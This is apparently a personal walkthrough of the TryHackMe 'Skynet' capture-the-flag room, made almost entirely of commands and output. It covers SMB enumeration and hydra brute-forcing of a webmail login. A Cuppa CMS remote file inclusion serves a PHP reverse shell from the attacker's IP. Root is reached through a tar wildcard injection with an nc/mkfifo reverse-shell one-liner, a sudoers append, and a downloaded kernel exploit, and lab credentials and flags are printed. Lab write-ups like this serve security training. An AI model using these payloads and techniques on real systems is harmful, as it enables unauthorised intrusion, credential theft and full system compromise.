Nmap -sSVC -Pn -vv $IP

ffuf -u http://10.10.69.49/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
gobuster dir -u http://10.10.69.49/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

smbmap -H 10.10.69.49 
[+] Guest session       IP: 10.10.69.49:445     Name: 10.10.69.49                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

smbclient //10.10.69.49/anonymous
smb: \> ls
  .                                   D        0  Thu Nov 26 23:04:00 2020
  ..                                  D        0  Tue Sep 17 14:20:17 2019
  attention.txt                       N      163  Wed Sep 18 10:04:59 2019
  logs                                D        0  Wed Sep 18 11:42:16 2019
 
smb: \> get attention.txt
smb: \> cd logs
smb: \> ls
  .                                   D        0  Wed Sep 18 11:42:16 2019
  ..                                  D        0  Thu Nov 26 23:04:00 2020
  log2.txt                            N        0  Wed Sep 18 11:42:13 2019
  log1.txt                            N      471  Wed Sep 18 11:41:59 2019
  log3.txt                            N        0  Wed Sep 18 11:42:16 2019
  
smb: \> get log1.txt
smb: \> exit
cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

cat log1.txt     
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator


Open Burp ---> clear $ ---> add $ secretkey=
load wordlist log1.txt ---> start attack
--> cyborg007haloterminator with status 302


OR use hydra
hydra -l milesdyson -P log1.txt 10.10.1.235 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect." 

login http://10.10.69.49/squirrelmail/
milesdyson:cyborg007haloterminator
--->Samba Password reset--> 
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`


smbclient //10.10.69.49/milesdyson --user milesdyson
password: )s{A&2Z=F^n_E.B`


- What is Miles password for his emails?
cyborg007haloterminator

smbclient //10.10.69.49/milesdyson --user milesdyson
smb: \> ls
  .                                   D        0  Tue Sep 17 16:05:47 2019
  ..                                  D        0  Wed Sep 18 10:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 16:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 16:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 16:05:14 2019
  notes                               D        0  Tue Sep 17 16:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 16:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 16:05:14 2019

smb: \>cd notes
smb: \>ls
                                   D        0  Tue Sep 17 16:18:40 2019
  ..                                  D        0  Tue Sep 17 16:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 16:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 16:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 16:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 16:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 16:01:29 2019
  important.txt                       N      117  Tue Sep 17 16:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 16:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 16:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 16:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 16:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 16:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 16:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 16:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 16:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 16:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 16:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 16:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 16:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 16:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 16:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 16:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 16:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 16:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 16:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 16:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 16:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 16:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 16:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 16:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 16:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 16:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 16:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 16:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 16:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 16:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 16:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 16:01:29 2019

...important.txt
smb: \>get important.txt
smb: \>exit

cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife


- What is the hidden directory?
/45kra24zxs28v3yd


- What is the vulnerability called when you can include a remote file for malicious purposes?
ffuf -u http://10.10.69.49/45kra24zxs28v3yd/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
administrator           [Status: 301, Size: 335, Words: 20, Lines: 10]


http://10.10.69.49/45kra24zxs28v3yd/administrator/
---> Cuppa SMS

searchsploit Cuppa
searchsploit -p php/webapps/25971.txt
 Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/25971
     Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
File Type: ASCII text, with very long lines, with CRLF line terminators

cat /usr/share/exploitdb/exploits/php/webapps/25971.txt

/usr/share/webshells/php/php-reverse-shell.php /home
mv php-reverse-shell.php phpshell.php
vi phpshell.php
change ip = my ip
python3 -m http.server

http://10.10.69.49/45kra24zxs28v3yd/administrator//alerts/alertConfigField.php?urlConfig=http://10.6.88.227:8000/phpshell.php

on my machine
nc -lnvp 1234
$whoami
www-data

- What is the user flag?
hint:$whoami
www-data
$python -c "import pty; pty.spawn('/bin/bash')"
www-data@skynet:/tmp$ su milesdyson
su milesdyson
Password: cyborg007haloterminator
cat /home/milesdyson/user.txt
7ce5c2109a40f958099283600a9ae807


What is the root flag?
hint:
on my machine
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
on target machine
cd /tmp
wget http://myip:8000/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

.....
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
....
view /home/milesdyson/backups/backup.sh
cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/


(try https://gtfobins.github.io/gtfobins/tar/)

Run the following commands as “www-data” user (not milesdyson).
milesdyson@skynet$exit

www-data@skynet:/tmp$ cd /var/www/html
www-data@skynet$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.88.227 4445 >/tmp/f" > shell.sh
www-data@skynet$ touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
www-data@skynet$ touch "/var/www/html/--checkpoint=1"
www-data@skynet$ chmod +x shell.sh

on my machine nc -lnvp 4445
#whoami
root
cat /root/root.txt


OR $cd /var/www/html
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > sudo.sh
touch "/var/www/html/--checkpoint-action=exec=sh sudo.sh"
touch "/var/www/html/--checkpoint=1"
sudo su
#whoami
root


OR $ uname -a
uname -a
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
on my machine 
searchsploit 4.8.0-58
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalat | linux/local/43418.c
searchsploit -p linux/local/43418.c
gcc /usr/share/exploitdb/exploits/linux/local/43418.c -o /home/gd/exploit

on target machine
$cd /tmp
$wget http://10.6.88.227:8000/exploit
$chmod +x exploit
$ ./exploit
[.] starting
[.] checking distro and kernel versions
[.] kernel version '4.8.0-58-generic' detected
[~] done, versions looks good
[.] checking SMEP and SMAP
[~] done, looks good
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[~] done, kernel text:   ffffffff86c00000
[.] commit_creds:        ffffffff86ca5d20
[.] prepare_kernel_cred: ffffffff86ca6110
[.] SMEP bypass enabled, mmapping fake stack
[~] done, fake stack mmapped
[.] executing payload ffffffff86c17c55
[~] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@skynet:/tmp#whoami
root


3f0372db24753accc7179a282cd6a949


DONE!
THANKS THM

https://tryhackme.com/room/skynet
https://blog.tryhackme.com/skynet-writeup/
https://github.com/Kahvi-0/Writeups/blob/master/TryHackMe/Skynet.md
https://seceng.tech/2020/11/04/tryhackme-skynet-write-up/
https://www.aldeid.com/wiki/TryHackMe-Skynet
https://medium.com/azkrath/tryhackme-walkthrough-skynet-69399702ee5a  <---ok
